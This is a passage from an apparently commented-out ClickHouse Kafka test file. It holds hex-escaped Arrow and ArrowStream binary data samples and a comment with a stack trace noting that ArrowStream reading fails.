0\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00
\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00
\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# ],
# },
# 'ArrowStream' : {
# # Not working at all:
# # Error while opening a table: Invalid: Tried reading schema message, was null or length 0, Stack trace (when copying this message, always include the lines below):
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:117: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de0273f in /usr/bin/clickhouse
# # /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de026da in /usr/bin/clickhouse
# # /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de025ed in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0254a in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0165c in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# # /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# # /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# # /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# # /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# 'data_sample' : [
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00
\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
